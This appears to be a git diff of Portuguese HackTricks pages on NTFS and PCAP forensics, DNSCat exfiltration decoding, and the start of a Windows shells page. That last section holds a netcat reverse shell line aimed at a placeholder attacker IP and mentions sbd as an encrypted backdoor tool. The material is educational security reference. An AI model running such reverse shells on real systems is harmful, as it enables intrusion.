Também é útil entender que **esses atributos podem ser residentes** (ou seja, existem dentro de um determinado registro da MFT) ou **não residentes** (ou seja, existem fora de um determinado registro da MFT, em outro lugar no disco, e são simplesmente referenciados no registro). Por exemplo, se o atributo **$Data é residente**, isso significa que **todo o arquivo é salvo na MFT**, se for não residente, então o conteúdo do arquivo está em outra parte do sistema de arquivos.
Alguns atributos interessantes:
* [$STANDARD\_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard\_information.html) (entre outros):
* Data de criação
* Data de modificação
* Data de acesso
* Data de atualização da MFT
* Permissões de arquivo do DOS
* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (entre outros):
* Nome do arquivo
* Data de criação
* Data de modificação
* Data de acesso
* Data de atualização da MFT
* Tamanho alocado
* Tamanho real
* [Referência de arquivo](https://flatcap.org/linux-ntfs/ntfs/concepts/file\_reference.html) para o diretório pai.
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (entre outros):
* Contém os dados do arquivo ou a indicação dos setores onde os dados residem. No exemplo a seguir, o atributo de dados não é residente, então o atributo fornece informações sobre os setores onde os dados residem.
- [$STANDARD\_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard\_information.html) (entre outros):
- Data de criação
- Data de modificação
- Data de acesso
- Data de atualização da MFT
- Permissões de arquivo do DOS
- [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (entre outros):
- Nome do arquivo
- Data de criação
- Data de modificação
- Data de acesso
- Data de atualização da MFT
- Tamanho alocado
- Tamanho real
- [Referência de arquivo](https://flatcap.org/linux-ntfs/ntfs/concepts/file\_reference.html) para o diretório pai.
- [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (entre outros):
- Contém os dados do arquivo ou a indicação dos setores onde os dados residem. No exemplo a seguir, o atributo de dados não é residente, então o atributo fornece informações sobre os setores onde os dados residem.
![](<../../../.gitbook/assets/image (507) (1) (1).png>)
![](<../../../.gitbook/assets/image (509).png>)
### Carimbos de data e hora do NTFS
### Carimbos de Data e Hora do NTFS
![](<../../../.gitbook/assets/image (512).png>)
Outra ferramenta útil para analisar a MFT é [**MFT2csv**](https://github.com/jschicht/Mft2Csv) (selecione o arquivo mft ou a imagem e pressione dump all e extract para extrair todos os objetos).\
Este programa extrairá todos os dados da MFT e os apresentará em formato CSV. Também pode ser usado para despejar arquivos.
Outra ferramenta útil para analisar a MFT é o [**MFT2csv**](https://github.com/jschicht/Mft2Csv) (selecione o arquivo mft ou a imagem e pressione dump all e extract para extrair todos os objetos).\
Este programa extrairá todos os dados da MFT e os apresentará em formato CSV. Também pode ser usado para extrair arquivos.
![](<../../../.gitbook/assets/image (513).png>)
### $LOGFILE
O arquivo **`$LOGFILE`** contém **logs** sobre as **ações** que foram **realizadas** **em** **arquivos**. Ele também **salva** a **ação** que precisaria ser realizada em caso de um **refazer** e a ação necessária para **voltar** ao **estado** **anterior**.\
O arquivo **`$LOGFILE`** contém **logs** sobre as **ações** que foram **realizadas** **em** **arquivos**. Ele também **salva** a **ação** que precisaria realizar em caso de **refazer** e a ação necessária para **voltar** ao **estado anterior**.\
Esses logs são úteis para a MFT reconstruir o sistema de arquivos em caso de algum tipo de erro. O tamanho máximo deste arquivo é **65536KB**.
Para inspecionar o `$LOGFILE`, você precisa extraí-lo e inspecionar o `$MFT` previamente com [**MFT2csv**](https://github.com/jschicht/Mft2Csv).\
Em seguida, execute [**LogFileParser**](https://github.com/jschicht/LogFileParser) contra este arquivo e selecione o arquivo `$LOGFILE` exportado e o CVS da inspeção do `$MFT`. Você obterá um arquivo CSV com os logs da atividade do sistema de arquivos registrados pelo log `$LOGFILE`.
Para inspecionar o `$LOGFILE`, você precisa extrair e inspecionar o `$MFT` previamente com [**MFT2csv**](https://github.com/jschicht/Mft2Csv).\
Em seguida, execute [**LogFileParser**](https://github.com/jschicht/LogFileParser) neste arquivo e selecione o arquivo `$LOGFILE` exportado e o CVS da inspeção do `$MFT`. Você obterá um arquivo CSV com os logs da atividade do sistema de arquivos registrados pelo log `$LOGFILE`.
![](<../../../.gitbook/assets/image (515).png>)
Filtrando por nomes de arquivos, você pode ver **todas as ações realizadas contra um arquivo**:
Filtrando por nomes de arquivos, você pode ver **todas as ações realizadas em um arquivo**:
![](<../../../.gitbook/assets/image (514).png>)
### $USNJnrl
O arquivo `$EXTEND/$USNJnrl/$J` é um fluxo de dados alternativo do arquivo `$EXTEND$USNJnrl`. Este artefato contém um **registro de mudanças produzidas dentro do volume NTFS com mais detalhes do que `$LOGFILE`**.
O arquivo `$EXTEND/$USNJnrl/$J` é um fluxo de dados alternativo do arquivo `$EXTEND$USNJnrl`. Este artefato contém um **registro de alterações produzidas dentro do volume NTFS com mais detalhes do que o `$LOGFILE`**.
Para inspecionar este arquivo, você pode usar a ferramenta [**UsnJrnl2csv**](https://github.com

88
forensics/basic-forensic-methodology/pcap-inspection/README.md
View file

@ -2,33 +2,33 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com **a missão de promover o conhecimento técnico**, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com **a missão de promover conhecimento técnico**, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
{% embed url="https://www.rootedcon.com/" %}
{% hint style="info" %}
Uma nota sobre **PCAP** vs **PCAPNG**: existem duas versões do formato de arquivo PCAP; **PCAPNG é mais recente e não é suportado por todas as ferramentas**. Você pode precisar converter um arquivo de PCAPNG para PCAP usando o Wireshark ou outra ferramenta compatível, para poder trabalhar com ele em algumas outras ferramentas.
Uma nota sobre **PCAP** vs **PCAPNG**: existem duas versões do formato de arquivo PCAP; **PCAPNG é mais recente e não é suportado por todas as ferramentas**. Você pode precisar converter um arquivo de PCAPNG para PCAP usando o Wireshark ou outra ferramenta compatível, para trabalhar com ele em algumas outras ferramentas.
{% endhint %}
## Ferramentas online para pcaps
* Se o cabeçalho do seu pcap estiver **corrompido**, você deve tentar **corrigi-lo** usando: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* Extraia **informações** e procure por **malware** dentro de um pcap em [**PacketTotal**](https://packettotal.com)
* Procure por **atividades maliciosas** usando [**www.virustotal.com**](https://www.virustotal.com) e [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
* Procure por **atividade maliciosa** usando [**www.virustotal.com**](https://www.virustotal.com) e [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
## Extrair Informações
@ -37,10 +37,10 @@ As seguintes ferramentas são úteis para extrair estatísticas, arquivos, etc.
### Wireshark
{% hint style="info" %}
**Se você vai analisar um PCAP, basicamente precisa saber como usar o Wireshark**
**Se você for analisar um PCAP, basicamente deve saber como usar o Wireshark**
{% endhint %}
Você pode encontrar algumas dicas do Wireshark em:
Você pode encontrar alguns truques do Wireshark em:
{% content-ref url="wireshark-tricks.md" %}
[wireshark-tricks.md](wireshark-tricks.md)
@ -48,9 +48,9 @@ Você pode encontrar algumas dicas do Wireshark em:
### Xplico Framework
[**Xplico**](https://github.com/xplico/xplico) _(apenas linux)_ pode **analisar** um **pcap** e extrair informações dele. Por exemplo, de um arquivo pcap, o Xplico extrai cada email (protocolos POP, IMAP e SMTP), todos os conteúdos HTTP, cada chamada VoIP (SIP), FTP, TFTP, e assim por diante.
[**Xplico** ](https://github.com/xplico/xplico)_(apenas linux)_ pode **analisar** um **pcap** e extrair informações dele. Por exemplo, a partir de um arquivo pcap, o Xplico extrai cada e-mail (protocolos POP, IMAP e SMTP), todos os conteúdos HTTP, cada chamada VoIP (SIP), FTP, TFTP, e assim por diante.
**Instalar**
**Instale**
```bash
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
@ -62,30 +62,30 @@ sudo apt-get install xplico
/etc/init.d/apache2 restart
/etc/init.d/xplico start
```
Acesso a _**127.0.0.1:9876**_ com credenciais _**xplico:xplico**_
Acesse _**127.0.0.1:9876**_ com as credenciais _**xplico:xplico**_
Em seguida, crie um **novo caso**, crie uma **nova sessão** dentro do caso e **faça o upload do arquivo pcap**.
Em seguida, crie um **novo caso**, crie uma **nova sessão** dentro do caso e **faça upload do arquivo pcap**.
### NetworkMiner
Assim como o Xplico, é uma ferramenta para **analisar e extrair objetos de pcaps**. Possui uma edição gratuita que você pode **baixar** [**aqui**](https://www.netresec.com/?page=NetworkMiner). Funciona com **Windows**.\
Esta ferramenta também é útil para obter **outras informações analisadas** dos pacotes, a fim de saber o que estava acontecendo de uma maneira **mais rápida**.
Esta ferramenta também é útil para obter **outras informações analisadas** dos pacotes para saber o que estava acontecendo de forma **mais rápida**.
### NetWitness Investigator
Você pode baixar [**NetWitness Investigator aqui**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Funciona no Windows)**.\
Esta é outra ferramenta útil que **analisa os pacotes** e organiza as informações de maneira útil para **saber o que está acontecendo internamente**.
Você pode baixar o [**NetWitness Investigator aqui**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Funciona no Windows)**.\
Esta é outra ferramenta útil que **analisa os pacotes** e organiza as informações de forma útil para **saber o que está acontecendo internamente**.
![](<../../../.gitbook/assets/image (567) (1).png>)
### [BruteShark](https://github.com/odedshimon/BruteShark)
* Extração e codificação de nomes de usuário e senhas (HTTP, FTP, Telnet, IMAP, SMTP...)
* Extrair hashes de autenticação e quebrá-los usando Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* Construir um diagrama visual da rede (nós de rede & usuários)
* Extrair e codificar nomes de usuário e senhas (HTTP, FTP, Telnet, IMAP, SMTP...)
* Extrair hashes de autenticação e quebrá-los usando o Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* Construir um diagrama visual de rede (Nós de rede e usuários)
* Extrair consultas DNS
* Reconstruir todas as sessões TCP & UDP
* File Carving
* Esculpir arquivos
### Capinfos
```
@ -93,19 +93,19 @@ capinfos capture.pcap
```
### Ngrep
Se você está **procurando** por **algo** dentro do pcap, você pode usar **ngrep**. Aqui está um exemplo usando os principais filtros:
Se você está **procurando** por **algo** dentro do pcap, você pode usar o **ngrep**. Aqui está um exemplo usando os filtros principais:
```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
```
### Carving
### Esculpir
Utilizando técnicas comuns de carving, é possível extrair arquivos e informações do pcap:
O uso de técnicas comuns de escultura pode ser útil para extrair arquivos e informações do pcap:
{% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### Captura de credenciais
### Capturando credenciais
Você pode usar ferramentas como [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) para analisar credenciais de um pcap ou de uma interface ao vivo.
@ -119,7 +119,7 @@ Você pode usar ferramentas como [https://github.com/lgandx/PCredz](https://gith
### Suricata
**Instalar e configurar**
**Instalação e configuração**
```
apt-get install suricata
apt-get install oinkmaster
@ -135,14 +135,14 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) é uma ferramenta que
* Lê um arquivo PCAP e extrai fluxos Http.
* Descomprime quaisquer fluxos comprimidos com gzip
* Escaneia cada arquivo com yara
* Escreve um report.txt
* Opcionalmente salva arquivos correspondentes em um Dir
* Descomprime qualquer fluxo comprimido com gzip.
* Escaneia cada arquivo com yara.
* Escreve um report.txt.
* Opcionalmente salva arquivos correspondentes em um diretório.
### Análise de Malware
Verifique se você consegue encontrar alguma impressão digital de um malware conhecido:
Verifique se consegue encontrar alguma impressão digital de um malware conhecido:
{% content-ref url="../malware-analysis.md" %}
[malware-analysis.md](../malware-analysis.md)
@ -150,11 +150,9 @@ Verifique se você consegue encontrar alguma impressão digital de um malware co
## Zeek
> Zeek é um analisador de tráfego de rede passivo e de código aberto. Muitos operadores usam o Zeek como um Monitor de Segurança de Rede (NSM) para apoiar investigações de atividades suspeitas ou maliciosas. O Zeek também suporta uma ampla gama de tarefas de análise de tráfego além do domínio de segurança, incluindo medição de desempenho e solução de problemas.
> Zeek é um analisador de tráfego de rede passivo e de código aberto. Muitos operadores usam o Zeek como Monitor de Segurança de Rede (NSM) para apoiar investigações de atividades suspeitas ou maliciosas. O Zeek também suporta uma ampla gama de tarefas de análise de tráfego além do domínio de segurança, incluindo medição de desempenho e solução de problemas.
Basicamente, os logs criados pelo `zeek` não são **pcaps**. Portanto, você precisará usar **outras ferramentas** para analisar os logs onde as **informações** sobre os pcaps estão.
### Informações de Conexões
```bash
#Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?)
@ -221,7 +219,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
#See top DNS domain requested with rita
rita show-exploded-dns -H --limit 10 zeek_logs
```
## Outras dicas de análise de pcap
## Outros truques de análise de pcap
{% content-ref url="dnscat-exfiltration.md" %}
[dnscat-exfiltration.md](dnscat-exfiltration.md)
@ -239,20 +237,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com **a missão de promover o conhecimento técnico**, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com **a missão de promover conhecimento técnico**, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

33
forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
View file

@ -1,21 +1,21 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
Se você tem um pcap com dados sendo **exfiltrados por DNSCat** (sem usar criptografia), você pode encontrar o conteúdo exfiltrado.
Se você tiver um pcap com dados sendo **exfiltrados pelo DNSCat** (sem usar criptografia), você pode encontrar o conteúdo exfiltrado.
Você só precisa saber que os **primeiros 9 bytes** não são dados reais, mas estão relacionados à comunicação **C\&C**:
Você só precisa saber que os **primeiros 9 bytes** não são dados reais, mas estão relacionados com a **comunicação C\&C**:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -37,20 +37,21 @@ last = qry
Para mais informações: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
Existe um script que funciona com Python3: https://github.com/josemlwdf/DNScat-Decoder
```
python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

147
generic-methodologies-and-resources/shells/windows.md
View file

@ -2,21 +2,21 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -24,8 +24,8 @@ Encontre vulnerabilidades que importam mais para que você possa corrigi-las mai
## Lolbas
A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para linux.\
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (ab)usados para realizar alguns tipos de ações inesperadas como **executar código arbitrário.**
A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows, assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para Linux.\
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (mal)usados para realizar algum tipo de ação inesperada como **executar código arbitrário.**
## NC
```bash
@ -33,7 +33,7 @@ nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## SBD
**sbd** é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Funciona em sistemas operacionais semelhantes ao Unix e no Microsoft Win32. O sbd possui criptografia AES-CBC-128 + HMAC-SHA1 (por Christophe Devine), execução de programas (opção -e), escolha de porta de origem, reconexão contínua com atraso e algumas outras características interessantes. O sbd suporta apenas comunicação TCP/IP. sbd.exe (parte da distribuição Kali Linux: /usr/share/windows-resources/sbd/sbd.exe) pode ser carregado em um sistema Windows como uma alternativa ao Netcat.
**sbd** é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Ele roda em sistemas operacionais semelhantes ao Unix e no Microsoft Win32. sbd apresenta criptografia AES-CBC-128 + HMAC-SHA1 (por Christophe Devine), execução de programas (opção -e), escolha de porta de origem, reconexão contínua com atraso e algumas outras funcionalidades interessantes. sbd suporta apenas comunicação TCP/IP. sbd.exe (parte da distribuição Kali Linux: /usr/share/windows-resources/sbd/sbd.exe) pode ser enviado para um computador com Windows como uma alternativa ao Netcat.
## Python
```bash
@ -41,6 +41,8 @@ nc.exe -e cmd.exe <Attacker_IP> <PORT>
